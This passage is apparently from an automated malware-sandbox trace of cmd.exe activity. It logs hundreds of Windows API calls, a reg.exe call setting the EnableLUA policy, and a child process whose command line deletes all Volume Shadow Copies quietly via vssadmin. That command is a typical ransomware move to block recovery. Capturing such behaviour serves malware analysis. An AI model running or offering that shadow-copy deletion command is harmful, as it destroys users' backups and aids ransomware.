Locale=0x409, LCType=0x37, lpLCData=0x4a6ca700, cchData=32 | out: lpLCData="Sun") returned 4 [0071.386] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a6b7b40, cchData=8 | out: lpLCData=".") returned 2 [0071.386] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a6ca4e0, cchData=8 | out: lpLCData=",") returned 2 [0071.386] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0071.387] GetProcessHeap () returned 0x3a0000 [0071.387] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x0, Size=0x20c) returned 0x3bba80 [0071.387] GetConsoleTitleW (in: lpConsoleTitle=0x3bba80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0071.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.388] GetFileType (hFile=0x7) returned 0x2 [0071.395] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.395] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1efdd8 | out: lpMode=0x1efdd8) returned 1 [0071.398] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.398] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1efdf0 | out: lpConsoleScreenBufferInfo=0x1efdf0) returned 1 [0071.402] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.402] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1efda0 | out: lpConsoleScreenBufferInfo=0x1efda0) returned 1 [0071.402] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1efdd8 | out: lpNumberOfAttrsWritten=0x1efdd8) returned 1 [0071.403] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0071.403] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0071.403] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0071.403] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0071.404] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0071.404] GetProcessHeap () returned 0x3a0000 [0071.404] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x4012) returned 0x3bce30 [0071.404] GetProcessHeap () returned 0x3a0000 [0071.404] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x4010) returned 0x3c0e50 [0071.404] GetProcessHeap () returned 0x3a0000 [0071.404] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x1e) returned 0x3b4760 [0071.404] GetEnvironmentVariableW (in: lpName="windir", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="C:\\Windows") returned 0xa [0071.405] GetProcessHeap () returned 0x3a0000 [0071.405] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4760 | out: hHeap=0x3a0000) returned 1 [0071.405] GetProcessHeap () returned 0x3a0000 [0071.405] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3c0e50 | out: hHeap=0x3a0000) returned 1 [0071.405] GetProcessHeap () returned 0x3a0000 [0071.405] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bce30 | out: hHeap=0x3a0000) returned 1 [0071.407] _wcsicmp (_String1="C:\\Windows\\System32\\reg.exe", _String2=")") returned 58 [0071.407] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\reg.exe") returned 3 [0071.407] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\reg.exe") returned 3 [0071.407] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\reg.exe") returned 6 [0071.407] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\reg.exe") returned 6 [0071.407] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\reg.exe") returned 15 [0071.407] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\reg.exe") returned 15 [0071.407] GetProcessHeap () returned 0x3a0000 [0071.407] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb0) returned 0x3bbca0 [0071.407] GetProcessHeap () returned 0x3a0000 [0071.407] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x48) returned 0x3bbd60 [0071.410] GetProcessHeap () returned 0x3a0000 [0071.410] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xdc) returned 0x3bbdb0 [0071.410] GetConsoleTitleW (in: lpConsoleTitle=0x1efbb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0071.411] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0071.411] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0071.411] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef740, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef720, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef720*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0071.411] GetProcessHeap () returned 0x3a0000 [0071.411] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x218) returned 0x3bbea0 [0071.411] GetProcessHeap () returned 0x3a0000 [0071.411] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x114) returned 0x3bc0c0 [0071.411] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0071.412] GetProcessHeap () returned 0x3a0000 [0071.412] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x420) returned 0x3a1320 [0071.412] SetErrorMode (uMode=0x0) returned 0x0 [0071.412] SetErrorMode (uMode=0x1) returned 0x0 [0071.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\.", nBufferLength=0x208, lpBuffer=0x3a1330, lpFilePart=0x1ef440 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x1ef440*="System32") returned 0x13 [0071.412] SetErrorMode (uMode=0x0) returned 0x1 [0071.412] GetProcessHeap () returned 0x3a0000 [0071.412] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3a1320, Size=0x48) returned 0x3a1320 [0071.412] GetProcessHeap () returned 0x3a0000 [0071.412] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3a1320) returned 0x48 [0071.412] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\.") returned 1 [0071.412] GetProcessHeap () returned 0x3a0000 [0071.412] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x3e) returned 0x3b8c60 [0071.412] GetProcessHeap () returned 0x3a0000 [0071.412] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x68) returned 0x3bc1e0 [0071.413] GetProcessHeap () returned 0x3a0000 [0071.413] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3bc1e0, Size=0x3e) returned 0x3bc1e0 [0071.413] GetProcessHeap () returned 0x3a0000 [0071.413] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bc1e0) returned 0x3e [0071.413] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0071.413] GetProcessHeap () returned 0x3a0000 [0071.413] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xe8) returned 0x3bc230 [0071.417] GetProcessHeap () returned 0x3a0000 [0071.417] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3bc230, Size=0x7e) returned 0x3bc230 [0071.417] GetProcessHeap () returned 0x3a0000 [0071.417] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bc230) returned 0x7e [0071.434] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0071.434] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.exe", fInfoLevelId=0x1, lpFindFileData=0x1ef1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef1b0) returned 0x3bc2c0 [0071.434] GetProcessHeap () returned 0x3a0000 [0071.434] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x0, Size=0x28) returned 0x3b4760 [0071.434] FindClose (in: hFindFile=0x3bc2c0 | out: hFindFile=0x3bc2c0) returned 1 [0071.435] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0071.435] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0071.435] GetConsoleTitleW (in: lpConsoleTitle=0x1ef700, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0071.435] GetProcessHeap () returned 0x3a0000 [0071.435] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x21c) returned 0x3b9c30 [0071.435] GetConsoleTitleW (in: lpConsoleTitle=0x3b9c40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0071.435] GetProcessHeap () returned 0x3a0000 [0071.435] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b9c30, Size=0x15c) returned 0x3b9c30 [0071.435] GetProcessHeap () returned 0x3a0000 [0071.435] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b9c30) returned 0x15c [0071.435] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\System32\\cmd.exe - C:\\Windows\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f") returned 1 [0071.436] GetProcessHeap () returned 0x3a0000 [0071.436] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b9c30 | out: hHeap=0x3a0000) returned 1 [0071.436] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef4b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef478 | out: lpAttributeList=0x1ef4b8, lpSize=0x1ef478) returned 1 [0071.436] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef4b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef468, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef4b8, lpPreviousValue=0x0) returned 1 [0071.436] GetStartupInfoW (in: lpStartupInfo=0x1ef5d0 | out: lpStartupInfo=0x1ef5d0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3b9c7e, hStdOutput=0x3b9c40, hStdError=0x3b9c40)) [0071.436] GetProcessHeap () returned 0x3a0000 [0071.436] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x20) returned 0x3b4790 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0071.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0071.438] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0071.438] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0071.438] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0071.438] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0071.438] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0071.438] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0071.438] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0071.438] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0071.438] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0071.438] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0071.438] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0071.438] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0071.438] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0071.438] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0071.438] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0071.438] GetProcessHeap () returned 0x3a0000 [0071.438] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4790 | out: hHeap=0x3a0000) returned 1 [0071.438] GetProcessHeap () returned 0x3a0000 [0071.438] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x12) returned 0x3b8ad0 [0071.438] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0071.440] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\reg.exe", lpCommandLine="C:\\Windows\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1ef4f0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef4a0 | out: lpCommandLine="C:\\Windows\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f", lpProcessInformation=0x1ef4a0*(hProcess=0x54, hThread=0x50, dwProcessId=0x814, dwThreadId=0x824)) returned 1 [0071.489] CloseHandle (hObject=0x50) returned 1 [0071.489] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0071.489] GetProcessHeap () returned 0x3a0000 [0071.489] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bae00 | out: hHeap=0x3a0000) returned 1 [0071.489] GetEnvironmentStringsW () returned 0x3bae00* [0071.489] GetProcessHeap () returned 0x3a0000 [0071.489] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xae8) returned 0x3bee30 [0071.489] FreeEnvironmentStringsW (penv=0x3bae00) returned 1 [0071.489] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0072.824] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1ef3e8 | out: lpExitCode=0x1ef3e8*=0x0) returned 1 [0072.824] CloseHandle (hObject=0x54) returned 1 [0072.824] _vsnwprintf (in: _Buffer=0x1ef658, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef3f8 | out: _Buffer="00000000") returned 8 [0072.825] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0072.825] GetProcessHeap () returned 0x3a0000 [0072.825] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bee30 | out: hHeap=0x3a0000) returned 1 [0072.825] GetEnvironmentStringsW () returned 0x3bc2c0* [0072.825] GetProcessHeap () returned 0x3a0000 [0072.825] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb0e) returned 0x3c0440 [0072.825] FreeEnvironmentStringsW (penv=0x3bc2c0) returned 1 [0072.825] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0072.825] GetProcessHeap () returned 0x3a0000 [0072.825] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3c0440 | out: hHeap=0x3a0000) returned 1 [0072.825] GetEnvironmentStringsW () returned 0x3bc2c0* [0072.825] GetProcessHeap () returned 0x3a0000 [0072.825] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb0e) returned 0x3c0440 [0072.825] FreeEnvironmentStringsW (penv=0x3bc2c0) returned 1 [0072.825] GetProcessHeap () returned 0x3a0000 [0072.825] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b8ad0 | out: hHeap=0x3a0000) returned 1 [0072.825] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef4b8 | out: lpAttributeList=0x1ef4b8) [0072.839] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 1 [0072.840] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.840] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0072.840] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.840] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a6ae194 | out: lpMode=0x4a6ae194) returned 1 [0072.840] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.840] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a6ae198 | out: lpMode=0x4a6ae198) returned 1 [0072.840] SetConsoleInputExeNameW () returned 0x1 [0072.840] GetConsoleOutputCP () returned 0x1b5 [0072.841] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6bbfe0 | out: lpCPInfo=0x4a6bbfe0) returned 1 [0072.841] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0072.841] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.841] GetFileType (hFile=0x3) returned 0x2 [0072.842] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0072.842] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1efe88 | out: lpMode=0x1efe88) returned 1 [0072.842] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x1efc00 | out: TokenHandle=0x1efc00*=0x0) returned 0xc000007c [0072.842] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x1efc00 | out: TokenHandle=0x1efc00*=0x54) returned 0x0 [0072.842] NtQueryInformationToken (in: TokenHandle=0x54, TokenInformationClass=0x12, TokenInformation=0x1efc10, TokenInformationLength=0x4, ReturnLength=0x1efc18 | out: TokenInformation=0x1efc10, ReturnLength=0x1efc18) returned 0x0 [0072.842] NtQueryInformationToken (in: TokenHandle=0x54, TokenInformationClass=0x1a, TokenInformation=0x1efc18, TokenInformationLength=0x4, ReturnLength=0x1efc10 | out: TokenInformation=0x1efc18, ReturnLength=0x1efc10) returned 0x0 [0072.842] NtClose (Handle=0x54) returned 0x0 [0072.842] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x1efbe0, nSize=0x0, Arguments=0x1efbe8 | out: lpBuffer="鰰;") returned 0xf [0072.843] GetProcessHeap () returned 0x3a0000 [0072.843] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x218) returned 0x3a1380 [0072.843] GetConsoleTitleW (in: lpConsoleTitle=0x1efc30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0072.843] wcsstr (_Str="C:\\Windows\\System32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0072.843] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\cmd.exe") returned 1 [0072.844] GetProcessHeap () returned 0x3a0000 [0072.844] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3a1380 | out: hHeap=0x3a0000) returned 1 [0072.844] LocalFree (hMem=0x3b9c30) returned 0x0 [0072.844] GetProcessHeap () returned 0x3a0000 [0072.844] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bc230 | out: hHeap=0x3a0000) returned 1 [0072.844] GetProcessHeap () returned 0x3a0000 [0072.844] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bc1e0 | out: hHeap=0x3a0000) returned 1 [0072.844] GetProcessHeap () returned 0x3a0000 [0072.844] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b8c60 | out: hHeap=0x3a0000) returned 1 [0072.844] GetProcessHeap () returned 0x3a0000 [0072.844] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3a1320 | out: hHeap=0x3a0000) returned 1 [0072.844] GetProcessHeap () returned 0x3a0000 [0072.844] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bc0c0 | out: hHeap=0x3a0000) returned 1 [0072.844] GetProcessHeap () returned 0x3a0000 [0072.844] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bbea0 | out: hHeap=0x3a0000) returned 1 [0072.844] GetProcessHeap () returned 0x3a0000 [0072.844] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bbdb0 | out: hHeap=0x3a0000) returned 1 [0072.844] GetProcessHeap () returned 0x3a0000 [0072.844] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bbd60 | out: hHeap=0x3a0000) returned 1 [0072.844] GetProcessHeap () returned 0x3a0000 [0072.844] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bbca0 | out: hHeap=0x3a0000) returned 1 [0072.844] GetProcessHeap () returned 0x3a0000 [0072.844] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb8f0 | out: hHeap=0x3a0000) returned 1 [0072.844] GetProcessHeap () returned 0x3a0000 [0072.844] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3babe0 | out: hHeap=0x3a0000) returned 1 [0072.844] _vsnwprintf (in: _Buffer=0x4a6c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef918 | out: _Buffer="\r\n") returned 2 [0072.844] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.844] GetFileType (hFile=0x7) returned 0x2 [0072.845] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0072.845] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef8a8 | out: lpMode=0x1ef8a8) returned 1 [0072.845] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.845] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a6c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef8e8, lpReserved=0x0 | out: lpBuffer=0x4a6c6340*, lpNumberOfCharsWritten=0x1ef8e8*=0x2) returned 1 [0072.845] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0072.845] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0072.845] _vsnwprintf (in: _Buffer=0x4a6aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1ef928 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0072.846] _vsnwprintf (in: _Buffer=0x4a6aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x1ef928 | out: _Buffer=">") returned 1 [0072.846] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.846] GetFileType (hFile=0x7) returned 0x2 [0072.846] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0072.846] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef8d8 | out: lpMode=0x1ef8d8) returned 1 [0072.846] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.846] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a6aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x1ef918, lpReserved=0x0 | out: lpBuffer=0x4a6aeb60*, lpNumberOfCharsWritten=0x1ef918*=0x26) returned 1 [0072.846] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.846] GetFileType (hFile=0x3) returned 0x2 [0072.847] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.847] GetFileType (hFile=0x3) returned 0x2 [0072.847] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0072.847] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1efbf8 | out: lpMode=0x1efbf8) returned 1 [0072.847] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.847] GetFileType (hFile=0x3) returned 0x2 [0072.847] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0072.847] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1efbf8 | out: lpMode=0x1efbf8) returned 1 [0072.848] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.848] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0072.848] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1efb90 | out: lpConsoleScreenBufferInfo=0x1efb90) returned 1 [0072.848] ReadConsoleW (hConsoleInput=0x3, lpBuffer=0x4a6be320, nNumberOfCharsToRead=0x2000, lpNumberOfCharsRead=0x1efc10, pInputControl=0x1efb80) Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x3fd85000" os_pid = "0x730" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x7a4" cmd_line = "\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], 